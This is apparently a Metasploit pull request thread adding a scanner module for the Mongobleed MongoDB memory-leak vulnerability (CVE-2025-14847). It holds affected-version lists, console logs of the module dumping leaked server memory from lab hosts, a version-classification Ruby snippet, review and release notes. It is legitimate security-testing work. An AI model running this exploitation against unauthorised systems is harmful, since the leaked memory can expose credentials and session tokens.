@xaitax xaitax commented Dec 30, 2025

Summary

This PR adds a new auxiliary scanner module for CVE-2025-14847 (Mongobleed), a memory disclosure vulnerability in MongoDB's zlib decompression handling.

Vulnerability

By sending crafted OP_COMPRESSED messages with inflated BSON document lengths, attackers can leak server memory contents without authentication. Leaked data may include credentials, session tokens, connection strings, and application data.

Affected Versions

Per MongoDB JIRA SERVER-115508:

  • MongoDB 3.6.x, 4.0.x, 4.2.x (EOL, no fix)
  • MongoDB 4.4.0 - 4.4.29 (fixed in 4.4.30)
  • MongoDB 5.0.0 - 5.0.31 (fixed in 5.0.32)
  • MongoDB 6.0.0 - 6.0.26 (fixed in 6.0.27)
  • MongoDB 7.0.0 - 7.0.27 (fixed in 7.0.28)
  • MongoDB 8.0.0 - 8.0.16 (fixed in 8.0.17)
  • MongoDB 8.2.0 - 8.2.2 (fixed in 8.2.3)

Features

  • Automatic version detection and vulnerability assessment
  • Multi-pass scanning for maximum data collection
  • Quick scan mode for fast vulnerability confirmation
  • Secret pattern detection with configurable regex
  • Hex dump output option
  • Progress tracking with ETA

Verification

Tested against several MongoDB versions.

Regular scan

msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017  - MongoDB version: 4.2.3
[+] 192.168.1.100:27017  - Version 4.2.3 is VULNERABLE (EOL, no fix available)
[*] 192.168.1.100:27017  - Scanning 8173 offsets (20-8192, step=1)
[!] 192.168.1.100:27017  - Secret pattern detected at offset 20: 'conn' in context: ...[conn72889] end connectio...
[+] 192.168.1.100:27017  - offset=20   len=82  : [conn72889] end connection 192.168.1.23:39451 (0 connections now open).321ea32
[+] 192.168.1.100:27017  - offset=117  len=16  : ....l..`J-*.-NgP
[+] 192.168.1.100:27017  - offset=379  len=377 : .U..C....F.$..J$E..<8......1(.F.m6.)PTb....QN.t-..w......E..>D.;........YG_.....
[+] 192.168.1.100:27017  - offset=501  len=40  : id bson type in element with field name
[*] 192.168.1.100:27017  - Progress: 500/8173 (6.1%) - 6 leaks found - ETA: 103s
[+] 192.168.1.100:27017  - offset=778  len=251 : ......0..ZT.[....(..W......T...PRY...........W.P.Y..............N...v.O..D....)]
[*] 192.168.1.100:27017  - Progress: 1000/8173 (12.2%) - 7 leaks found - ETA: 97s
[+] 192.168.1.100:27017  - offset=1141 len=15  : T./S./.K.dZ1.((
[*] 192.168.1.100:27017  - Progress: 1500/8173 (18.4%) - 8 leaks found - ETA: 91s
[+] 192.168.1.100:27017  - offset=1594 len=12  :  field name
[+] 192.168.1.100:27017  - offset=1757 len=39  : d bson type in element with field name
[+] 192.168.1.100:27017  - offset=1774 len=13  : h field name
[+] 192.168.1.100:27017  - offset=1776 len=11  : field name
[+] 192.168.1.100:27017  - offset=1778 len=18  : t with field name
[*] 192.168.1.100:27017  - Progress: 2000/8173 (24.5%) - 15 leaks found - ETA: 84s
[+] 192.168.1.100:27017  - offset=2038 len=39  : id bson type in element with fiel..aS.V
[*] 192.168.1.100:27017  - Progress: 2500/8173 (30.6%) - 17 leaks found - ETA: 77s
[+] 192.168.1.100:27017  - offset=2805 len=146 : ...86....0h..g....2H........E..Dk,.Yn..........=f[d0.}...;.."...7...w.i.......|M
[*] 192.168.1.100:27017  - Progress: 3000/8173 (36.7%) - 19 leaks found - ETA: 70s
[*] 192.168.1.100:27017  - Progress: 3500/8173 (42.8%) - 19 leaks found - ETA: 63s
[*] 192.168.1.100:27017  - Progress: 4000/8173 (48.9%) - 19 leaks found - ETA: 57s
[*] 192.168.1.100:27017  - Progress: 4500/8173 (55.1%) - 19 leaks found - ETA: 50s
[+] 192.168.1.100:27017  - offset=4570 len=38  :  bson type in element with field name
[+] 192.168.1.100:27017  - offset=4597 len=241 : ..v.;.0z~.A[H<[..8.C.8...h.c..R...dd.M6....i)....Y.....=}.I.!...>:..}.<.....Z:.~
[*] 192.168.1.100:27017  - Progress: 5000/8173 (61.2%) - 21 leaks found - ETA: 43s
[*] 192.168.1.100:27017  - Progress: 5500/8173 (67.3%) - 21 leaks found - ETA: 36s
[*] 192.168.1.100:27017  - Progress: 6000/8173 (73.4%) - 21 leaks found - ETA: 29s
[+] 192.168.1.100:27017  - offset=6133 len=22  : ......;...#..B...-...R
[+] 192.168.1.100:27017  - offset=6134 len=249 : ......;...#..B...-...R.i..Es.a...J.5..,.....=;-e..K....z....O.........y......k].
[*] 192.168.1.100:27017  - Progress: 6500/8173 (79.5%) - 23 leaks found - ETA: 23s
[*] 192.168.1.100:27017  - Progress: 7000/8173 (85.6%) - 23 leaks found - ETA: 16s
[*] 192.168.1.100:27017  - Progress: 7500/8173 (91.8%) - 23 leaks found - ETA: 9s
[*] 192.168.1.100:27017  - Progress: 8000/8173 (97.9%) - 23 leaks found - ETA: 2s

[+] 192.168.1.100:27017  - Total leaked: 1638 bytes
[+] 192.168.1.100:27017  - Unique fragments: 23
[+] 192.168.1.100:27017  - Leaked data saved to: /root/.msf4/loot/20251230130757_default_192.168.1.100_mongodb.memory_l_746607.bin

[!] 192.168.1.100:27017  - Potential secrets detected:
[!] 192.168.1.100:27017  -   - Pattern 'conn' at offset 20 (pos 1): ...[conn72889] end connectio...
[*] 192.168.1.100:27017  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Quick & Repeated scan

msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
REPEAT => 3
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
QUICK_SCAN => true
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
[*] 192.168.1.100:27017  - MongoDB version: 4.2.3
[+] 192.168.1.100:27017  - Version 4.2.3 is VULNERABLE (EOL, no fix available)
[*] 192.168.1.100:27017  - Running 3 scan passes to maximize data collection...
[*] 192.168.1.100:27017  - === Pass 1/3 ===
[*] 192.168.1.100:27017  - Scanning 152 offsets (20-8192, step=1, quick mode)
[!] 192.168.1.100:27017  - Secret pattern detected at offset 20: 'conn' in context: ...[conn81063] end connectio...
[+] 192.168.1.100:27017  - offset=20   len=82  : [conn81063] end connection 192.168.1.23:33343 (0 connections now open).321ea32
[+] 192.168.1.100:27017  - offset=404  len=377 : .U..C....F.$..J$E..<8......1(.F.m6.)PTb....QN.t-..w......E..>D.;........YG_.....
[+] 192.168.1.100:27017  - offset=502  len=40  : id bson type in element with field name
[+] 192.168.1.100:27017  - offset=2042 len=39  : id bson type in element with fiel..aS.V
[+] 192.168.1.100:27017  - offset=3476 len=205 : ...8.....0h..g......:N;./..1.j+..X2..&.........i).=.0,...............q^.;.i..Z..
[+] 192.168.1.100:27017  - offset=3476 len=38  :  bson type in element with field name
[+] 192.168.1.100:27017  - offset=3604 len=158 : ....Adb#...R?.B..z..(n...!0;.qh..k{...wW,.N..25.....i..9.......f[...L..0.t......
[+] 192.168.1.100:27017  - offset=6292 len=188 : ......;..G.....e[..9.......8FQm%..KF...c....=;-e.1.....z....O..c.......P..S{....
[*] 192.168.1.100:27017  - Pass 1 complete: 11 new leaks (11 total unique)
[*] 192.168.1.100:27017  - === Pass 2/3 ===
[*] 192.168.1.100:27017  - Scanning 152 offsets (20-8192, step=1, quick mode)
[!] 192.168.1.100:27017  - Secret pattern detected at offset 20: 'conn' in context: ...id.244.214:40627 (0 connections now open).kn...
[+] 192.168.1.100:27017  - offset=20   len=82  :  found in object with unknown _id.244.214:40627 (0 connections now open).known _
[*] 192.168.1.100:27017  - Pass 2 complete: 1 new leaks (12 total unique)
[*] 192.168.1.100:27017  - === Pass 3/3 ===
[*] 192.168.1.100:27017  - Scanning 152 offsets (20-8192, step=1, quick mode)
[+] 192.168.1.100:27017  - offset=20   len=33  :  found in object with unknown _id
[*] 192.168.1.100:27017  - Pass 3 complete: 1 new leaks (13 total unique)

[+] 192.168.1.100:27017  - Total leaked: 1256 bytes
[+] 192.168.1.100:27017  - Unique fragments: 13
[+] 192.168.1.100:27017  - Leaked data saved to: /root/.msf4/loot/20251230131112_default_192.168.1.100_mongodb.memory_l_881723.bin

[!] 192.168.1.100:27017  - Potential secrets detected:
[!] 192.168.1.100:27017  -   - Pattern 'conn' at offset 20 (pos 1): ...[conn81063] end connectio...
[!] 192.168.1.100:27017  -   - Pattern 'conn' at offset 20 (pos 51): ...id.244.214:40627 (0 connections now open).kn...
[*] 192.168.1.100:27017  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

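The module's version assessment (the "Version 4.2.3 is VULNERABLE (EOL, no fix available)" line above) can be reproduced from the affected-version list quoted from SERVER-115508. The following is an added example, not the PR's module code: it classifies a version string such as the one the module prints, and it treats the "Could not determine MongoDB version" case and unlisted branches (development series such as 4.1 or 8.1) as unknown rather than safe. The function names `mongobleed_status`, `parse_version` and `describe` are assumptions made for this example.

```ruby
# Added example (not the Metasploit module's own code): classify a MongoDB
# server version against the affected ranges listed in SERVER-115508 as
# quoted in the PR description. Input format ("4.2.3", optionally with a
# "-rc0"-style suffix) is an assumption for this example.

# Branch => first fixed release, or nil where the PR lists the branch as
# EOL with no fix. Branches not listed (e.g. development series such as
# 4.1 or 8.1) are deliberately absent and are reported as :unknown.
MONGOBLEED_FIXED_IN = {
  '3.6' => nil,
  '4.0' => nil,
  '4.2' => nil,
  '4.4' => '4.4.30',
  '5.0' => '5.0.32',
  '6.0' => '6.0.27',
  '7.0' => '7.0.28',
  '8.0' => '8.0.17',
  '8.2' => '8.2.3'
}.freeze

# Returns [branch, Gem::Version] for a "major.minor.patch[-suffix]" string,
# or nil when the string is missing (version detection failed) or is not a
# version at all.
def parse_version(str)
  return nil if str.nil?

  m = str.strip.match(/\A(\d+)\.(\d+)\.(\d+)(?:-[0-9A-Za-z]+(?:\.[0-9A-Za-z]+)*)?\z/)
  return nil unless m

  # Gem::Version orders a pre-release such as "8.0.17-rc0" below "8.0.17",
  # so a release candidate of the fixed version is still reported vulnerable.
  ["#{m[1]}.#{m[2]}", Gem::Version.new(m[0])]
end

# One of :vulnerable_eol, :vulnerable, :fixed, :unknown.
def mongobleed_status(version_str)
  parsed = parse_version(version_str)
  return :unknown unless parsed

  branch, version = parsed
  return :unknown unless MONGOBLEED_FIXED_IN.key?(branch)

  fixed = MONGOBLEED_FIXED_IN[branch]
  return :vulnerable_eol if fixed.nil?

  version < Gem::Version.new(fixed) ? :vulnerable : :fixed
end

# Human-readable line in the style of the module output shown in the PR.
def describe(version_str)
  status = mongobleed_status(version_str)
  case status
  when :vulnerable_eol
    "Version #{version_str} is VULNERABLE (EOL, no fix available)"
  when :vulnerable
    branch, = parse_version(version_str)
    "Version #{version_str} is VULNERABLE (fixed in #{MONGOBLEED_FIXED_IN[branch]})"
  when :fixed
    "Version #{version_str} is not affected by CVE-2025-14847"
  else
    'Could not determine MongoDB version; assess the host manually'
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, including the "version unknown" case.
  ['4.2.3', '8.0.16', '8.0.17', '8.0.17-rc0', '6.0.27', '8.1.0', nil].each do |v|
    puts "#{v.inspect.ljust(12)} => #{describe(v)}"
  end
end
```

Comparing with `Gem::Version` rather than string comparison matters for two-digit patch levels (4.4.29 vs 4.4.30) and for pre-release suffixes; the `:unknown` result for an unlisted branch is the conservative choice, since the PR does not state that those series are safe.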

@dledda-r7 dledda-r7 self-assigned this Dec 30, 2025

@dledda-r7 dledda-r7 left a comment


msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run

[!] 127.0.0.1:27017       - Could not determine MongoDB version
[*] 127.0.0.1:27017       - Proceeding with exploitation attempt...
[*] 127.0.0.1:27017       - Scanning 8173 offsets (20-8192, step=1)
[+] 127.0.0.1:27017       - offset=393  len=315 :  144 11 22 26 0 1 20 0 51 0 40356 3862147072 57685 18446744073709551615 94376708
[*] 127.0.0.1:27017       - Progress: 500/8173 (6.1%) - 5 leaks found - ETA: 15s
[*] 127.0.0.1:27017       - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 14s
[*] 127.0.0.1:27017       - Progress: 1500/8173 (18.4%) - 13 leaks found - ETA: 13s
[*] 127.0.0.1:27017       - Progress: 2000/8173 (24.5%) - 19 leaks found - ETA: 12s
[+] 127.0.0.1:27017       - offset=2293 len=92  : x\u0010f\u0005\u0003BY\u00026\b...7.6_.$1\u0017.YD\u001asa\u0007 s.6X\u001aC.J.f
[*] 127.0.0.1:27017       - Progress: 2500/8173 (30.6%) - 21 leaks found - ETA: 11s
[*] 127.0.0.1:27017       - Progress: 3000/8173 (36.7%) - 21 leaks found - ETA: 10s
[*] 127.0.0.1:27017       - Progress: 3500/8173 (42.8%) - 21 leaks found - ETA: 9s
[*] 127.0.0.1:27017       - Progress: 4000/8173 (48.9%) - 23 leaks found - ETA: 8s
[*] 127.0.0.1:27017       - Progress: 4500/8173 (55.1%) - 23 leaks found - ETA: 7s
[*] 127.0.0.1:27017       - Progress: 5000/8173 (61.2%) - 23 leaks found - ETA: 6s
[*] 127.0.0.1:27017       - Progress: 5500/8173 (67.3%) - 23 leaks found - ETA: 5s
[*] 127.0.0.1:27017       - Progress: 6000/8173 (73.4%) - 23 leaks found - ETA: 4s
[*] 127.0.0.1:27017       - Progress: 6500/8173 (79.5%) - 24 leaks found - ETA: 3s
[+] 127.0.0.1:27017       - offset=6660 len=38  :  requested with cache fill ratio < 25%
[*] 127.0.0.1:27017       - Progress: 7000/8173 (85.6%) - 26 leaks found - ETA: 2s
[*] 127.0.0.1:27017       - Progress: 7500/8173 (91.8%) - 26 leaks found - ETA: 1s
[*] 127.0.0.1:27017       - Progress: 8000/8173 (97.9%) - 26 leaks found - ETA: 0s

[+] 127.0.0.1:27017       - Total leaked: 514 bytes
[+] 127.0.0.1:27017       - Unique fragments: 26
[+] 127.0.0.1:27017       - Leaked data saved to: /home/j/.msf4/loot/20251230143158_default_127.0.0.1_mongodb.memory_l_080581.bin
[*] 127.0.0.1:27017       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) >

@dledda-r7 dledda-r7 merged commit acc206b into rapid7:master Dec 30, 2025
18 checks passed
@xaitax xaitax deleted the CVE-2025-14847_Mongobleed branch December 30, 2025 13:50
@jbx81-1337 jbx81-1337 mentioned this pull request Jan 2, 2026
@xaitax xaitax restored the CVE-2025-14847_Mongobleed branch January 2, 2026 11:55
@dledda-r7 dledda-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Jan 9, 2026
@dledda-r7

Release Notes

This adds an auxiliary scanner module that exploits mongobleed (CVE-2025-14847) to dump memory from a live instance of the NoSQL database.
